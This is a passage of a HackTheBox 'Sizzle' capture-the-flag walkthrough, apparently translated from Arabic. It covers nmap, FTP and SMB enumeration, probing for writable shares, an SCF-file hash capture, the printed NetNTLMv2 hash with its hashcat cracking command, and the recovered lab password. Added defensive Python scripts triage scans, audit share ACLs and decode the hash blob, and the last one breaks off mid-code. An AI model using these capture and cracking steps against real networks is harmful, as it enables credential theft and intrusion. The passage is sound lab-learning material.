Sizzle - in Arabic

Sizzle walkthrough in Arabic

Recon

nmap

nmap -sV -sC -F -Pn 10.10.10.103

I used -F (fast mode, only the most common ports) so the scan finishes quickly; I had already tried -p- for all the ports and it took far too long.

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 01:49 EDT
Nmap scan report for 10.10.10.103
Host is up (0.49s latency).
Not shown: 92 filtered ports
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
443/tcp open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
445/tcp open  microsoft-ds?
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15m53s, deviation: 0s, median: 15m53s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-19T06:06:25
|_  start_date: 2021-05-19T00:11:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.26 seconds
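The scan output above already carries several findings worth writing down before touching anything else, and they are exactly the kind of thing a -F scan surfaces quickly: anonymous FTP on 21, TRACE enabled on both IIS listeners, an LDAP/HTTPS certificate that expired almost a year before the scan, and a 15m53s clock skew on a domain controller. As an added example (not part of this write-up), here is a small Python triage script that pulls those items out of nmap's normal output; the sample input is the relevant lines copied from the scan above, and the 300-second Kerberos tolerance is assumed from the default policy:

```python
"""Triage nmap normal output into findings a defender should record.

Added example, not part of the write-up. SAMPLE_SCAN is the relevant lines of
the scan above; KERBEROS_MAX_SKEW_S is the default policy value and is an
assumption of this example.
"""
import re
from datetime import datetime

# Constructed sample: copied from the nmap output above, non-essential lines dropped.
SAMPLE_SCAN = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 01:49 EDT
Nmap scan report for 10.10.10.103
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
443/tcp open  ssl/http      Microsoft IIS httpd 10.0
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=sizzle.htb.local
|_Not valid after:  2020-07-02T17:58:55
Host script results:
|_clock-skew: mean: 15m53s, deviation: 0s, median: 15m53s
"""

KERBEROS_MAX_SKEW_S = 300  # default Kerberos clock tolerance (assumed policy value)


def parse_duration(text):
    """nmap's '15m53s' / '1h2m3s' / '-45s' notation -> signed seconds."""
    m = re.fullmatch(r"(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?", text)
    if not m:
        raise ValueError(f"unrecognised duration: {text!r}")
    sign, h, mi, s = m.groups()
    total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    return -total if sign else total


def triage_nmap(output):
    """Return (port, finding) tuples in the order they appear in the output."""
    findings = []
    scan_date = None
    port = None
    for line in output.splitlines():
        m = re.search(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})", line)
        if m:                                   # the scan date anchors cert expiry checks
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d")
            continue
        m = re.match(r"^(\d+/(?:tcp|udp))\s+open\s+(\S+)", line)
        if m:                                   # script lines that follow belong to this port
            port = m.group(1)
            continue
        if line.startswith("Host script results"):
            port = "host"
            continue
        if "Anonymous FTP login allowed" in line:
            findings.append((port, "anonymous FTP login enabled"))
        elif "Potentially risky methods:" in line:
            methods = line.split(":", 1)[1].split()
            findings.append((port, "risky HTTP methods: " + ", ".join(methods)))
        m = re.search(r"Not valid after:\s+(\d{4}-\d{2}-\d{2})", line)
        if m and scan_date:
            expires = datetime.strptime(m.group(1), "%Y-%m-%d")
            if expires < scan_date:             # compared as calendar days, see note below
                findings.append((port, f"TLS certificate expired on {m.group(1)}"))
        m = re.search(r"clock-skew: mean: (\S+),", line)
        if m:
            skew = parse_duration(m.group(1))
            if abs(skew) > KERBEROS_MAX_SKEW_S:
                findings.append((port, f"clock skew {skew}s exceeds Kerberos tolerance"))
    return findings


if __name__ == "__main__":
    for port, finding in triage_nmap(SAMPLE_SCAN):
        print(f"{port:8} {finding}")
```

The skew line deserves attention on a DC: Kerberos rejects requests outside the tolerance window, so a client whose clock is this far off either fails or quietly falls back to NTLM, which is an operational bug to correct (and something to sync before any Kerberos-based step). Dates are compared as calendar days, which is enough for a certificate that expired months earlier; a same-day expiry would need the scanner's EDT and the certificate's UTC reconciled.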

The results show sizzle.htb.local, so add it to

/etc/hosts

FTP

Log in as anonymous, with username and password anonymous / anonymous

As you can see, nothing there, so I decided to move on to the web.

Web :80

The site looks like this:

Nothing in the source code.

Check the web, check port 445, check the SSL certificate in case there's something there I missed. I did directory enumeration and found a few interesting things, but nothing very useful.

Here it's 403 Forbidden. There are a few methods and tricks we could try, but for now I won't; I'll move on to the next thing, and if nothing works out later I'll come back here and try them.

At this path

https://sizzle.htb.local/certsrv

it asks for a username and password; this is basically simple authentication, so naturally we could try guessing it.

So I went to SMB.

SMB

smbclient -L 10.10.10.103
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        CertEnroll      Disk      Active Directory Certificate Services share
        Department Shares Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Operations      Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

The share named CertEnroll is interesting because up on the web we have the same path, but we don't have permissions to do anything with it, so let's go to Department Shares.

smbclient "//10.10.10.103/Department Shares"
smb: \> dir
  .                                   D        0  Tue Jul  3 11:22:32 2018
  ..                                  D        0  Tue Jul  3 11:22:32 2018
  Accounting                          D        0  Mon Jul  2 15:21:43 2018
  Audit                               D        0  Mon Jul  2 15:14:28 2018
  Banking                             D        0  Tue Jul  3 11:22:39 2018
  CEO_protected                       D        0  Mon Jul  2 15:15:01 2018
  Devops                              D        0  Mon Jul  2 15:19:33 2018
  Finance                             D        0  Mon Jul  2 15:11:57 2018
  HR                                  D        0  Mon Jul  2 15:16:11 2018
  Infosec                             D        0  Mon Jul  2 15:14:24 2018
  Infrastructure                      D        0  Mon Jul  2 15:13:59 2018
  IT                                  D        0  Mon Jul  2 15:12:04 2018
  Legal                               D        0  Mon Jul  2 15:12:09 2018
  M&A                                 D        0  Mon Jul  2 15:15:25 2018
  Marketing                           D        0  Mon Jul  2 15:14:43 2018
  R&D                                 D        0  Mon Jul  2 15:11:47 2018
  Sales                               D        0  Mon Jul  2 15:14:37 2018
  Security                            D        0  Mon Jul  2 15:21:47 2018
  Tax                                 D        0  Mon Jul  2 15:16:54 2018
  Users                               D        0  Tue Jul 10 17:39:32 2018
  ZZ_ARCHIVE                          D        0  Mon Jul  2 15:32:58 2018

                7779839 blocks of size 4096. 3552765 blocks available

Let's download them all first

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Inside Users you'll find usernames; you can take those as a user list. I tried digging around here and there and came out with nothing. So I sat and thought about one thing we could check: whether we have write permissions on the shares. Honestly, I don't recall ever seeing that in a pentest or in bug hunting, but in the end this is a CTF and anything goes, so we'll do the following:

First, create a directory

mkdir mount

Second, use the mount command to mount the share onto the directory I just created

sudo mount -t cifs "//10.10.10.103/Department Shares" mount

It'll prompt you for a password like this; just press Enter.

Password for root@//10.10.10.103/Department Shares: 

Run ls -la

OK, as you can see these are our files. Going by the permissions shown in red, I should be able to write to what's there since I'm root, so let's try writing, say by creating a file.

As is clear: Permission denied. Bottom line, boss, it's kicking us out (brushing us off, expelling, booting... and the rest of the nice synonyms). So it occurred to me to do a one-liner, a single-line bash command that goes in and tries to write in every directory.

Enum write permission first shot

for i in $(ls); do touch "$i/test.txt"; done
touch: cannot touch 'Accounting/test.txt': Permission denied
touch: cannot touch 'Audit/test.txt': Permission denied
touch: cannot touch 'Banking/test.txt': Permission denied
touch: cannot touch 'CEO_protected/test.txt': Permission denied
touch: cannot touch 'Devops/test.txt': Permission denied
touch: cannot touch 'Finance/test.txt': Permission denied
touch: cannot touch 'HR/test.txt': Permission denied
touch: cannot touch 'Infosec/test.txt': Permission denied
touch: cannot touch 'Infrastructure/test.txt': Permission denied
touch: cannot touch 'IT/test.txt': Permission denied
touch: cannot touch 'Legal/test.txt': Permission denied
touch: cannot touch 'M&A/test.txt': Permission denied
touch: cannot touch 'Marketing/test.txt': Permission denied
touch: cannot touch 'R&D/test.txt': Permission denied
touch: cannot touch 'Sales/test.txt': Permission denied
touch: cannot touch 'Security/test.txt': Permission denied
touch: cannot touch 'Tax/test.txt': Permission denied
touch: cannot touch 'Users/test.txt': Permission denied
touch: cannot touch 'ZZ_ARCHIVE/test.txt': Permission denied

Of course, how lovely, all Permission denied. But no surrender, no retreat.

Enum write permission second shot

I remembered that with the smbcacls tool I can see the permissions, or more precisely the ACLs!

First let's look at the top-level directories like we did the first time, but this time with smbcacls

for i in $(ls); do printf '\n%s\n' "$i"; smbcacls -N "//10.10.10.103/Department Shares" "$i"; done

You should get something like this

Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Audit
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Banking
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

CEO_protected
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Devops
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Finance
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

HR
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Infosec
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Infrastructure
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

IT
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Legal
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

M&A
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Marketing
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

R&D
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Sales
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Security
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Tax
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

We're looking for the ACL that reads

ACL:Everyone:ALLOWED/OI|CI/FULL

This means everyone has full permissions and access. ZZ_ARCHIVE has this ACL, which means we can write there.

Now let's look at what's inside these directories

for i in $(ls); do for x in $(ls "$i"); do printf '\n%s/%s\n' "$i" "$x"; smbcacls -N "//10.10.10.103/Department Shares" "$i/$x"; done; done

It'll print a lot of data, but you'll find the ACL we want at

/Users/Public

Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

So we have two places we can write to
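Both the touch loop in the first shot and the two smbcacls loops are answering one audit question by hand: where on this share can a broad principal write? The flags column in smbcacls output decides it: OI is object inherit, CI is container inherit, and I marks an ACE inherited from the parent. The Everyone/READ ACE carries I everywhere, so it came down from the share root, while the Everyone/FULL ACE on ZZ_ARCHIVE and Users/Public lacks I, meaning it was set explicitly on those two folders, and its OI|CI makes every file dropped there inherit the same exposure. Here is an added Python example (not from the write-up) that parses the smbcacls output format shown above and reports such ACEs; the sample input is constructed from four of the entries printed above, and the list of "broad" principals is this example's own assumption:

```python
"""Audit smbcacls output for ACEs that let broad principals write to a share.

Added example, not part of the write-up. Input is the text the smbcacls loops
above print (a path line, then REVISION/CONTROL/OWNER/GROUP/ACL lines).
SAMPLE_SMBCACLS is constructed from four entries shown above; BROAD_PRINCIPALS
is an assumed policy list.
"""
import re

SAMPLE_SMBCACLS = r"""
Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ

ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ

Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
"""

# Principals whose write access on a departmental share is almost never intended (assumed list).
BROAD_PRINCIPALS = {"everyone", "authenticated users", "users", "domain users", "domain computers"}

# ACCESS_MASK bits that allow modification: FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_WRITE_EA,
# FILE_WRITE_ATTRIBUTES, DELETE, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL.
WRITE_BITS = 0x2 | 0x4 | 0x10 | 0x100 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000

ACE_RE = re.compile(r"^ACL:(?P<trustee>.+):(?P<kind>ALLOWED|DENIED)/(?P<flags>[^/]*)/(?P<mask>.+)$")


def is_broad(trustee):
    """'Everyone', 'BUILTIN\\Users', 'HTB\\Domain Users' -> True; SIDs and admins -> False."""
    return trustee.rsplit("\\", 1)[-1].lower() in BROAD_PRINCIPALS


def grants_write(mask):
    """smbcacls prints FULL/CHANGE/READ, an RWXDPO letter set, or a raw hex mask."""
    if mask in ("FULL", "CHANGE"):
        return True
    if mask == "READ":
        return False
    if mask.startswith("0x"):
        return bool(int(mask, 16) & WRITE_BITS)
    return any(ch in mask for ch in "WD")   # W = write, D = delete in letter form


def find_broad_write(output):
    """Return write-capable ACEs held by broad principals, in output order."""
    hits, path, denied = [], None, set()
    for line in output.splitlines():
        line = line.rstrip()
        if not line:
            continue
        if ":" not in line:                  # the echoed path that heads each block
            path, denied = line, set()
            continue
        m = ACE_RE.match(line)
        if not m:
            continue                         # REVISION / CONTROL / OWNER / GROUP lines
        trustee, kind, flags, mask = m.group("trustee", "kind", "flags", "mask")
        if not (is_broad(trustee) and grants_write(mask)):
            continue
        if kind == "DENIED":                 # a deny ACE for this trustee overrides its allows
            denied.add(trustee)
            continue
        if trustee in denied:
            continue
        flag_set = set(flags.split("|"))
        hits.append({"path": path, "trustee": trustee, "mask": mask,
                     "explicit": "I" not in flag_set,          # set on this folder, not inherited
                     "propagates": {"OI", "CI"} <= flag_set})  # new files/folders inherit it
    return hits


if __name__ == "__main__":
    for h in find_broad_write(SAMPLE_SMBCACLS):
        print(h)
```

On a real share audit the rows worth a finding are those with explicit set: an inherited Everyone/READ is a decision taken once at the root, but an explicit FULL to Everyone or Authenticated Users deep in the tree is usually an accident, and with OI|CI it also applies to whatever gets written there later. Note too that these ACLs were readable through a null session (smbcacls -N), which is itself worth a line in the report.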

Exploit

SCF File Attack

Why all this work? Because there's a kind of attack called SCF File Attack (click here)

amanda::HTB:9be9fd34c0e927f8:BBA79C2B7D92BD323728695003F2D7CA:0101000000000000C0653150DE09D201C447124086C661E1000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000010000000020000047E5928C44FD28913B4318D651F8DE351D58BDD648F9FF9C56F18F7743C915B70A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E00310036003000000000000000000000000000
hashcat.exe -m 5600 amanda_ntlmhash.txt rockyou.txt -d 1
AMANDA::HTB:9be9fd34c0e927f8:bba79c2b7d92bd323728695003f2d7ca:0101000000000000c0653150de09d201c447124086c661e1000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c00030034005700490004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000010000000020000047e5928c44fd28913b4318d651f8de351d58bdd648f9ff9c56f18f7743c915b70a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e00310036003000000000000000000000000000:Ashare1972

CREDS: amanda:Ashare1972
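The amanda line is in the format hashcat's mode 5600 consumes: user::domain:server_challenge:NTProofStr:blob. For a responder the useful part is not the cracking but the blob, which is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: a FILETIME timestamp, the client challenge, and the AV_PAIR target info. Most AV pairs are copied from whatever server issued the challenge (here a host calling itself WIN-PRH492RQAFV in domain SMB3, not HTB.LOCAL), while MsvAvTargetName and MsvAvChannelBindings are added by the client and name the service it believed it was talking to (cifs/10.10.16.160, the listener address in this capture). The following is an added Python decoder, not part of the write-up; it takes the captured line above as input (reproduced split at field boundaries, trailing zero padding after the EOL pair aside), and the AvId names are the ones MS-NLMP defines:

```python
"""Decode a NetNTLMv2 line (hashcat -m 5600 format) for incident-response triage.

Added example, not part of the original write-up. Field layout and AvId names
follow MS-NLMP (NTLMv2_CLIENT_CHALLENGE / AV_PAIR). Nothing here cracks
anything; it only explains what the captured line says.
"""
import re
from datetime import datetime, timedelta, timezone

# The line captured above, split at structure boundaries for readability.
CAPTURED_LINE = (
    "amanda::HTB:9be9fd34c0e927f8:BBA79C2B7D92BD323728695003F2D7CA:"
    "0101000000000000"                          # RespType 1, HiRespType 1, Reserved1/2
    "C0653150DE09D201"                          # TimeStamp (FILETIME, little-endian)
    "C447124086C661E1"                          # ChallengeFromClient
    "00000000"                                  # Reserved3
    "0200080053004D0042003300"                  # MsvAvNbDomainName  "SMB3"
    "01001E00570049004E002D0050005200480034003900320052005100410046005600"  # MsvAvNbComputerName
    "0400140053004D00420033002E006C006F00630061006C00"                      # MsvAvDnsDomainName
    "03003400570049004E002D0050005200480034003900320052005100410046005600"
    "2E0053004D00420033002E006C006F00630061006C00"                          # MsvAvDnsComputerName
    "0500140053004D00420033002E006C006F00630061006C00"                      # MsvAvDnsTreeName
    "07000800C0653150DE09D201"                  # MsvAvTimestamp
    "0600040002000000"                          # MsvAvFlags (0x2 = MIC present)
    "0800300030000000000000000100000000200000"  # MsvAvSingleHost (size 0x30, Z4, CustomData)
    "47E5928C44FD28913B4318D651F8DE35"          #   MachineID, first half
    "1D58BDD648F9FF9C56F18F7743C915B7"          #   MachineID, second half
    "0A001000" "0000000000000000" "0000000000000000"  # MsvAvChannelBindings (all zero)
    "0900220063006900660073002F00310030002E00310030002E00310036002E00310036003000"  # MsvAvTargetName
    "0000000000000000"                          # MsvAvEOL + padding
)

AV_NAMES = {
    0x1: "MsvAvNbComputerName", 0x2: "MsvAvNbDomainName", 0x3: "MsvAvDnsComputerName",
    0x4: "MsvAvDnsDomainName", 0x5: "MsvAvDnsTreeName", 0x6: "MsvAvFlags",
    0x7: "MsvAvTimestamp", 0x8: "MsvAvSingleHost", 0x9: "MsvAvTargetName",
    0xA: "MsvAvChannelBindings",
}
UTF16_PAIRS = {0x1, 0x2, 0x3, 0x4, 0x5, 0x9}


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line):
    """Split a hashcat 5600 line and decode the NTLMv2_CLIENT_CHALLENGE blob."""
    user, _, domain, server_challenge, ntproofstr, blob = line.strip().split(":", 5)
    pos = 0

    def take(n):                                  # read n bytes from the hex blob
        nonlocal pos
        chunk = bytes.fromhex(blob[pos:pos + 2 * n])
        pos += 2 * n
        return chunk

    resp_type, hi_resp_type = take(1)[0], take(1)[0]
    take(6)                                       # Reserved1 (2) + Reserved2 (4)
    timestamp = filetime_to_datetime(int.from_bytes(take(8), "little"))
    client_challenge = take(8).hex()
    take(4)                                       # Reserved3
    target_info = {}
    while pos + 8 <= len(blob):                   # AV_PAIR: AvId, AvLen, Value
        av_id = int.from_bytes(take(2), "little")
        av_len = int.from_bytes(take(2), "little")
        if av_id == 0:                            # MsvAvEOL terminates the list
            break
        value = take(av_len)
        name = AV_NAMES.get(av_id, f"MsvAv_{av_id:#x}")
        if av_id in UTF16_PAIRS:
            target_info[name] = value.decode("utf-16-le")
        elif av_id == 0x7:
            target_info[name] = filetime_to_datetime(int.from_bytes(value, "little"))
        else:
            target_info[name] = value.hex()
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr.lower(), "resp_type": (resp_type, hi_resp_type),
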